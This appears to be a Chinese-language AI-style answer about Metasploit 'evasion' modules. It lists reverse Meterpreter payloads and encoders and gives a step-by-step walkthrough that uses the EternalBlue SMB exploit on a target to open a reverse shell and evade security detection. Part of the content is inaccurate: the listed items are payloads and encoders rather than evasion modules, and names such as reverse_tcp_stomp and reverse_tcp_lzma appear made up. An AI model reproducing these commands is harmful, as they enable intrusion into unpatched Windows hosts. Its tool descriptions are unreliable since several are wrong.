Bootstrap

metasploit/modules/evasion 有哪些模块,以及具体使用案例

Metasploit框架的evasion模块用于生成绕过安全检测的有效载荷。以下是一些常见的evasion模块及其使用案例:

1. 通用Evasion模块

  • windows/meterpreter/reverse_tcp_rc4:使用RC4加密的反向TCP Meterpreter会话。

    set PAYLOAD windows/meterpreter/reverse_tcp_rc4
    set LHOST 192.168.1.2
    set LPORT 4444
    
  • windows/meterpreter/reverse_tcp_uuid:使用UUID生成器的反向TCP Meterpreter会话。

    set PAYLOAD windows/meterpreter/reverse_tcp_uuid
    set LHOST 192.168.1.2
    set LPORT 4444
    

2. 编码和混淆Evasion模块

  • x86/shikata_ga_nai:使用Shikata Ga Nai算法进行XOR编码。

    set ENCODER x86/shikata_ga_nai
    
  • x86/countdown:使用递减计数器进行编码。

    set ENCODER x86/countdown
    

3. 特定平台Evasion模块

  • windows/x64/meterpreter/reverse_tcp_stomp:使用STOMP协议的反向TCP Meterpreter会话。

    set PAYLOAD windows/x64/meterpreter/reverse_tcp_stomp
    set LHOST 192.168.1.2
    set LPORT 4444
    
  • linux/x86/meterpreter/reverse_tcp_lzma:使用LZMA压缩的反向TCP Meterpreter会话。

    set PAYLOAD linux/x86/meterpreter/reverse_tcp_lzma
    set LHOST 192.168.1.2
    set LPORT 4444
    

使用案例

假设你想利用一个Windows漏洞来获取远程控制,并且希望绕过安全检测,你可以按照以下步骤操作:

  1. 选择合适的exploit模块

    use exploit/windows/smb/ms17_010_eternalblue
    
  2. 设置目标IP

    set RHOSTS 192.168.1.1
    
  3. 选择合适的payload模块

    set PAYLOAD windows/meterpreter/reverse_tcp_rc4
    
  4. 设置本地监听地址和端口

    set LHOST 192.168.1.2
    set LPORT 4444
    
  5. 运行模块

    run
    

注意事项

  • 使用这些模块时,请确保你有合法的权限和目的。
  • 避免在未经授权的系统上进行测试,以免违反法律或政策。

通过这些模块和案例,你可以生成绕过安全检测的有效载荷,从而提高渗透测试的成功率。

;